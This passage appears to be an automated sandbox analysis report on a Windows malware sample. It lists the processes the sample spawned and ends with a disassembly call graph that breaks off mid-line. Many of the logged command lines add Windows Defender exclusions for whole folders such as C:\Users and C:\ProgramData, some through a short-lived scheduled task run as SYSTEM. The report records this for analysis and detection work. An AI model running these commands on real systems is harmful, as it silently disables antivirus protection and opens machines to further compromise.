                                                    Path:C:\Windows\System32\reg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                    Imagebase:0x7ff7f16f0000
                                                    File size:77'312 bytes
                                                    MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:18
                                                    Start time:22:43:59
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                    Imagebase:0x7ff777670000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:19
                                                    Start time:22:43:59
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff70f010000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:20
                                                    Start time:22:43:59
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                                    Imagebase:0x7ff691ad0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:21
                                                    Start time:22:43:59
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:SCHTASKS /Run /TN "Task1"
                                                    Imagebase:0x7ff691ad0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:22
                                                    Start time:22:43:59
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                    Imagebase:0x7ff777670000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:23
                                                    Start time:22:43:59
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff70f010000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:24
                                                    Start time:22:43:59
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                    Imagebase:0x7ff691ad0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:25
                                                    Start time:22:43:59
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\reg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                    Imagebase:0x7ff7f16f0000
                                                    File size:77'312 bytes
                                                    MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:26
                                                    Start time:22:44:00
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                    Imagebase:0x7ff777670000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:27
                                                    Start time:22:44:00
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff70f010000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:28
                                                    Start time:22:44:00
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                                    Imagebase:0x7ff691ad0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:29
                                                    Start time:22:44:00
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:SCHTASKS /Run /TN "Task1"
                                                    Imagebase:0x7ff691ad0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:30
                                                    Start time:22:44:00
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                    Imagebase:0x7ff777670000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:31
                                                    Start time:22:44:00
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                    Imagebase:0x7ff691ad0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:32
                                                    Start time:22:44:00
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff70f010000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:33
                                                    Start time:22:44:00
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\reg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                    Imagebase:0x7ff7f16f0000
                                                    File size:77'312 bytes
                                                    MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:34
                                                    Start time:22:44:01
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                    Imagebase:0x7ff777670000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:35
                                                    Start time:22:44:01
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff70f010000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:36
                                                    Start time:22:44:01
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
                                                    Imagebase:0x7ff691ad0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:37
                                                    Start time:22:44:01
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:SCHTASKS /Run /TN "Task1"
                                                    Imagebase:0x7ff691ad0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:38
                                                    Start time:22:44:01
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                                    Imagebase:0x7ff777670000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:39
                                                    Start time:22:44:01
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff70f010000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:40
                                                    Start time:22:44:01
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                    Imagebase:0x7ff691ad0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:41
                                                    Start time:22:44:02
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\reg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                                    Imagebase:0x7ff7f16f0000
                                                    File size:77'312 bytes
                                                    MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:2.1%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:32.3%
                                                      Total number of Nodes:458
                                                      Total number of Limit Nodes:10
                                                      execution_graph 14030 140005df3 14031 140005e71 14030->14031 14032 140005e84 CreateFileA 14031->14032 14033 140005f50 __SehTransFilter 14032->14033 14034 140005fc3 malloc ReadFile 14033->14034 15175 140007412 15176 140007333 15175->15176 15177 140007403 15176->15177 15178 1400073e0 LdrLoadDll 15176->15178 15178->15176 15526 140013670 InitializeCriticalSection CreateEventW CreateEventW CreateEventW 15529 1400054e0 15526->15529 15528 1400136ef 15530 140005506 _lock 15529->15530 15531 14000552c 15529->15531 15530->15528 15532 1400074d0 LdrLoadDll 15531->15532 15533 140005536 15532->15533 15534 140008370 3 API calls 15533->15534 15537 140005545 __SehTransFilter 15534->15537 15535 1400055b8 15536 140008de0 _lock 2 API calls 15535->15536 15538 1400055c0 sprintf_s 15536->15538 15537->15535 15539 1400074f0 LdrLoadDll 15537->15539 15538->15530 15540 140005561 CreateThread 15539->15540 15540->15538 15541 1400055b0 GetLastError 15540->15541 15541->15535 14039 140005a70 GetStartupInfoW GetProcessHeap HeapAlloc 14040 140005ab1 14039->14040 14041 140005add GetVersionExA 14039->14041 14044 140005abf 14040->14044 14089 140009540 14040->14089 14042 140005b0e GetProcessHeap HeapFree 14041->14042 14043 140005af0 GetProcessHeap HeapFree 14041->14043 14049 140005b3c 14042->14049 14046 140005d0b 14043->14046 14097 140009300 14044->14097 14048 140005ac9 14108 140008510 GetModuleHandleA 14048->14108 14112 14000a310 HeapCreate 14049->14112 14052 140005bec 14053 140005c12 14052->14053 14054 140005bf0 14052->14054 14058 140005c17 14053->14058 14055 140005bfe 14054->14055 14056 140009540 _lock 12 API calls 14054->14056 14057 140009300 _lock 10 API calls 14055->14057 14056->14055 14059 140005c08 14057->14059 14060 140005c3d 14058->14060 14061 140005c29 14058->14061 14063 140009540 _lock 12 API calls 14058->14063 14062 140008510 _lock 3 API calls 14059->14062 14115 140009f50 GetStartupInfoA 14060->14115 14064 140009300 _lock 10 API calls 14061->14064 14062->14053 14063->14061 14065 140005c33 14064->14065 14067 140008510 _lock 3 API calls 14065->14067 14067->14060 14069 140005c56 14135 140009e30 14069->14135 14072 140005c5b 14153 140009c30 14072->14153 14076 140005c73 14077 140005c81 14076->14077 14078 1400084e0 _lock 12 API calls 14076->14078 14183 140009690 14077->14183 14078->14077 14080 140005c86 14081 140005c94 14080->14081 14082 1400084e0 _lock 12 API calls 14080->14082 14195 140008650 14081->14195 14082->14081 14084 140005c9e 14085 1400084e0 _lock 12 API calls 14084->14085 14086 140005ca9 14084->14086 14085->14086 14199 140001520 14086->14199 14088 140005ad3 14088->14046 14093 14000954e _lock 14089->14093 14090 14000961c 14090->14044 14091 14000959c 14092 140009300 _lock 10 API calls 14091->14092 14092->14090 14093->14090 14093->14091 14094 1400095c9 GetStdHandle 14093->14094 14094->14091 14095 1400095dc 14094->14095 14095->14091 14096 1400095e2 WriteFile 14095->14096 14096->14091 14100 140009320 _lock 14097->14100 14098 140009330 14098->14048 14099 1400094dc GetStdHandle 14099->14098 14101 1400094ef 14099->14101 14100->14098 14100->14099 14103 140009375 _lock 14100->14103 14101->14098 14102 1400094f5 WriteFile 14101->14102 14102->14098 14103->14098 14104 1400093b9 GetModuleFileNameA 14103->14104 14105 1400093d9 _lock 14104->14105 14217 14000f000 14105->14217 14109 140008543 ExitProcess 14108->14109 14110 14000852a GetProcAddress 14108->14110 14110->14109 14111 14000853f 14110->14111 14111->14109 14113 14000a334 14112->14113 14114 14000a339 HeapSetInformation 14112->14114 14113->14052 14114->14052 14243 140008370 14115->14243 14117 140005c48 14117->14069 14128 1400084e0 14117->14128 14118 14000a1c4 GetStdHandle 14125 14000a17c 14118->14125 14119 140008370 3 API calls 14122 140009f8a 14119->14122 14120 14000a239 SetHandleCount 14120->14117 14121 14000a1d8 GetFileType 14121->14125 14122->14117 14122->14119 14123 14000a0e3 14122->14123 14122->14125 14123->14117 14124 14000a11c GetFileType 14123->14124 14123->14125 14248 14000edc0 14123->14248 14124->14123 14125->14117 14125->14118 14125->14120 14125->14121 14127 14000edc0 _lock 3 API calls 14125->14127 14127->14125 14129 140009540 _lock 12 API calls 14128->14129 14130 1400084ed 14129->14130 14131 140009300 _lock 10 API calls 14130->14131 14132 1400084f4 14131->14132 14133 1400073e0 _lock LdrLoadDll 14132->14133 14134 140008500 14133->14134 14136 140009e7c 14135->14136 14137 140009e3e GetCommandLineW 14135->14137 14140 140009e81 GetCommandLineW 14136->14140 14141 140009e69 14136->14141 14138 140009e49 GetCommandLineW 14137->14138 14139 140009e5e GetLastError 14137->14139 14138->14139 14139->14141 14142 140009e75 14139->14142 14140->14141 14141->14142 14143 140009e91 GetCommandLineA MultiByteToWideChar 14141->14143 14142->14072 14144 140009ec8 14143->14144 14145 140009ed9 14143->14145 14144->14072 14146 140008370 3 API calls 14145->14146 14147 140009eeb 14146->14147 14148 140009f32 14147->14148 14149 140009ef3 MultiByteToWideChar 14147->14149 14148->14072 14150 140009f13 14149->14150 14151 140009f2a 14149->14151 14150->14072 14262 140008de0 14151->14262 14154 140009c52 GetEnvironmentStringsW 14153->14154 14155 140009c86 14153->14155 14156 140009c6c GetLastError 14154->14156 14164 140009c60 14154->14164 14157 140009c91 GetEnvironmentStringsW 14155->14157 14158 140009c77 14155->14158 14156->14155 14156->14158 14160 140005c67 14157->14160 14157->14164 14159 140009d09 GetEnvironmentStrings 14158->14159 14158->14160 14159->14160 14161 140009d17 14159->14161 14179 1400099c0 GetModuleFileNameW 14160->14179 14163 140009d58 14161->14163 14167 140009d20 MultiByteToWideChar 14161->14167 14165 140008370 3 API calls 14163->14165 14267 140008300 14164->14267 14168 140009d68 14165->14168 14167->14160 14167->14161 14171 140009d7d 14168->14171 14172 140009d70 FreeEnvironmentStringsA 14168->14172 14169 140009ce1 __SehTransFilter 14174 140009cef FreeEnvironmentStringsW 14169->14174 14170 140009cd1 FreeEnvironmentStringsW 14170->14160 14173 140009de5 FreeEnvironmentStringsA 14171->14173 14175 140009d90 MultiByteToWideChar 14171->14175 14172->14160 14173->14160 14174->14160 14175->14171 14176 140009e0e 14175->14176 14177 140008de0 _lock 2 API calls 14176->14177 14178 140009e16 FreeEnvironmentStringsA 14177->14178 14178->14160 14182 140009a03 14179->14182 14180 140008300 _lock 17 API calls 14181 140009bca 14180->14181 14181->14076 14182->14180 14182->14181 14184 1400096b2 14183->14184 14185 1400096a8 14183->14185 14186 140008370 3 API calls 14184->14186 14185->14080 14194 1400096fa 14186->14194 14187 140009709 14187->14080 14188 1400097a5 14189 140008de0 _lock 2 API calls 14188->14189 14190 1400097b4 14189->14190 14190->14080 14191 140008370 3 API calls 14191->14194 14192 1400097e5 14193 140008de0 _lock 2 API calls 14192->14193 14193->14190 14194->14187 14194->14188 14194->14191 14194->14192 14197 140008666 14195->14197 14198 1400086bf 14197->14198 14283 140005380 14197->14283 14198->14084 14200 140001565 14199->14200 14201 140001569 14200->14201 14202 14000157e 14200->14202 14321 140001430 GetModuleFileNameW OpenSCManagerW 14201->14321 14205 140001595 OpenSCManagerW 14202->14205 14206 14000164f 14202->14206 14207 1400015b2 GetLastError 14205->14207 14208 1400015cf OpenServiceW 14205->14208 14209 140001654 14206->14209 14210 140001669 StartServiceCtrlDispatcherW 14206->14210 14207->14088 14211 140001611 DeleteService 14208->14211 14212 1400015e9 GetLastError CloseServiceHandle 14208->14212 14330 1400011f0 14209->14330 14210->14088 14214 140001626 CloseServiceHandle CloseServiceHandle 14211->14214 14215 14000161e GetLastError 14211->14215 14212->14088 14214->14088 14215->14214 14218 14000f01e _lock 14217->14218 14219 14000f03b LoadLibraryA 14218->14219 14222 14000f125 _lock 14218->14222 14220 14000f054 GetProcAddress 14219->14220 14221 1400094c9 14219->14221 14220->14221 14223 14000f06d _lock 14220->14223 14221->14048 14224 14000f165 14222->14224 14240 1400073e0 LdrLoadDll 14222->14240 14228 14000f075 GetProcAddress 14223->14228 14227 1400073e0 _lock LdrLoadDll 14224->14227 14235 14000f1a3 _lock 14224->14235 14226 1400073e0 _lock LdrLoadDll 14226->14221 14233 14000f1e9 14227->14233 14230 140007220 _lock 14228->14230 14232 14000f094 GetProcAddress 14230->14232 14231 1400073e0 _lock LdrLoadDll 14231->14224 14236 14000f0b3 _lock 14232->14236 14234 1400073e0 _lock LdrLoadDll 14233->14234 14233->14235 14234->14235 14235->14226 14236->14222 14237 14000f0e9 GetProcAddress 14236->14237 14238 14000f101 _lock 14237->14238 14238->14222 14239 14000f10d GetProcAddress 14238->14239 14239->14222 14241 140007333 14240->14241 14241->14240 14242 140007403 14241->14242 14242->14231 14246 1400083a0 14243->14246 14245 1400083e0 14245->14122 14246->14245 14247 1400083be Sleep 14246->14247 14254 14000e850 14246->14254 14247->14245 14247->14246 14249 1400073e0 _lock LdrLoadDll 14248->14249 14250 14000edec _lock 14249->14250 14251 14000ee1d _lock 14250->14251 14252 14000ee26 GetModuleHandleA 14250->14252 14251->14123 14252->14251 14253 14000ee38 GetProcAddress 14252->14253 14253->14251 14255 14000e865 14254->14255 14256 14000e8be HeapAlloc 14255->14256 14258 14000e876 _lock 14255->14258 14259 1400090b0 14255->14259 14256->14255 14256->14258 14258->14246 14260 1400073e0 _lock LdrLoadDll 14259->14260 14261 1400090c5 14260->14261 14261->14255 14263 140008de9 HeapFree 14262->14263 14266 140008e19 _lock 14262->14266 14264 140008dff _lock 14263->14264 14263->14266 14265 140008e09 GetLastError 14264->14265 14265->14266 14266->14148 14268 140008320 14267->14268 14270 140008358 14268->14270 14271 140008338 Sleep 14268->14271 14272 1400090f0 14268->14272 14270->14169 14270->14170 14271->14268 14271->14270 14273 14000919e 14272->14273 14280 140009103 14272->14280 14274 1400090b0 _lock LdrLoadDll 14273->14274 14276 1400091a3 _lock 14274->14276 14275 14000914c HeapAlloc 14275->14280 14281 140009173 _lock 14275->14281 14276->14268 14277 140009540 _lock 12 API calls 14277->14280 14278 1400090b0 _lock LdrLoadDll 14278->14280 14279 140009300 _lock 10 API calls 14279->14280 14280->14275 14280->14277 14280->14278 14280->14279 14280->14281 14282 140008510 _lock 3 API calls 14280->14282 14281->14268 14282->14280 14286 140005250 14283->14286 14285 140005389 14285->14198 14287 140005271 14286->14287 14288 1400073e0 _lock LdrLoadDll 14287->14288 14289 14000527e 14288->14289 14290 1400073e0 _lock LdrLoadDll 14289->14290 14291 14000528d 14290->14291 14297 1400052f0 _lock 14291->14297 14298 140008490 14291->14298 14293 1400052b5 14294 1400052d9 14293->14294 14293->14297 14301 140008400 14293->14301 14296 140008400 7 API calls 14294->14296 14294->14297 14296->14297 14297->14285 14299 1400084c5 HeapSize 14298->14299 14300 140008499 _lock 14298->14300 14300->14293 14303 140008430 14301->14303 14304 140008472 14303->14304 14305 140008450 Sleep 14303->14305 14306 14000e920 14303->14306 14304->14294 14305->14303 14305->14304 14307 14000e935 14306->14307 14308 14000e94c 14307->14308 14318 14000e95e 14307->14318 14309 140008de0 _lock 2 API calls 14308->14309 14312 14000e951 14309->14312 14310 14000e9b1 14311 1400090b0 _lock LdrLoadDll 14310->14311 14314 14000e9b9 _lock 14311->14314 14312->14303 14313 14000e973 HeapReAlloc 14313->14314 14313->14318 14314->14303 14315 14000e9f4 _lock 14317 14000e9f9 GetLastError 14315->14317 14316 1400090b0 _lock LdrLoadDll 14316->14318 14317->14314 14318->14310 14318->14313 14318->14315 14318->14316 14319 14000e9db _lock 14318->14319 14320 14000e9e0 GetLastError 14319->14320 14320->14314 14322 140001482 CreateServiceW 14321->14322 14323 14000147a GetLastError 14321->14323 14325 1400014ea GetLastError 14322->14325 14326 1400014df CloseServiceHandle 14322->14326 14324 1400014fd 14323->14324 14336 140004f30 14324->14336 14327 1400014f2 CloseServiceHandle 14325->14327 14326->14327 14327->14324 14329 14000150d 14329->14088 14331 1400011fa 14330->14331 14345 1400051d0 14331->14345 14334 140004f30 sprintf_s NtAllocateVirtualMemory 14335 140001262 14334->14335 14335->14088 14338 140004f39 __SehTransFilter 14336->14338 14337 140004f44 14337->14329 14338->14337 14341 140006c95 14338->14341 14340 14000660e sprintf_s 14340->14329 14343 140006d7b 14341->14343 14344 140006d9d 14341->14344 14342 140006f95 NtAllocateVirtualMemory 14342->14344 14343->14342 14343->14344 14344->14340 14348 140008270 14345->14348 14347 140001238 MessageBoxW 14347->14334 14349 14000827e 14348->14349 14350 1400082ac _lock 14348->14350 14349->14350 14352 140008120 14349->14352 14350->14347 14353 14000816a 14352->14353 14357 14000813b _lock 14352->14357 14355 1400081d7 14353->14355 14353->14357 14358 140007f50 14353->14358 14356 140007f50 sprintf_s 54 API calls 14355->14356 14355->14357 14356->14357 14357->14350 14365 140007f69 sprintf_s 14358->14365 14359 14000801d 14361 1400080d5 14359->14361 14362 14000802f 14359->14362 14360 140007f74 _lock 14360->14355 14363 14000cc00 sprintf_s 54 API calls 14361->14363 14364 14000804c 14362->14364 14367 140008081 14362->14367 14368 140008056 14363->14368 14374 14000cc00 14364->14374 14365->14359 14365->14360 14371 14000cd50 14365->14371 14367->14368 14382 14000c2a0 14367->14382 14368->14355 14372 140008300 _lock 17 API calls 14371->14372 14373 14000cd6a 14372->14373 14373->14359 14375 14000cc3f 14374->14375 14378 14000cc23 _lock sprintf_s 14374->14378 14375->14378 14390 14000fc50 14375->14390 14378->14368 14380 14000ccc5 _lock sprintf_s 14435 14000fd20 LeaveCriticalSection 14380->14435 14383 14000c2e0 14382->14383 14386 14000c2c3 _lock sprintf_s 14382->14386 14384 14000fc50 sprintf_s 25 API calls 14383->14384 14383->14386 14385 14000c34e 14384->14385 14387 14000c1f0 sprintf_s 2 API calls 14385->14387 14388 14000c367 _lock sprintf_s 14385->14388 14386->14368 14387->14388 14469 14000fd20 LeaveCriticalSection 14388->14469 14391 14000fc96 14390->14391 14392 14000fccb 14390->14392 14436 14000b400 14391->14436 14394 14000ccac 14392->14394 14395 14000fccf EnterCriticalSection 14392->14395 14394->14380 14400 14000c3f0 14394->14400 14395->14394 14403 14000c42e 14400->14403 14415 14000c427 _lock sprintf_s 14400->14415 14401 140004f30 sprintf_s NtAllocateVirtualMemory 14402 14000cbe6 14401->14402 14402->14380 14406 14000c4fb sprintf_s __SehTransFilter 14403->14406 14403->14415 14463 14000c1f0 14403->14463 14405 14000c841 14407 14000c86a 14405->14407 14408 14000cb20 WriteFile 14405->14408 14406->14405 14410 14000c526 GetConsoleMode 14406->14410 14409 14000c936 14407->14409 14417 14000c876 14407->14417 14411 14000cb53 GetLastError 14408->14411 14408->14415 14413 14000ca02 14409->14413 14422 14000c940 14409->14422 14410->14405 14412 14000c557 14410->14412 14411->14415 14412->14405 14414 14000c564 GetConsoleCP 14412->14414 14413->14415 14420 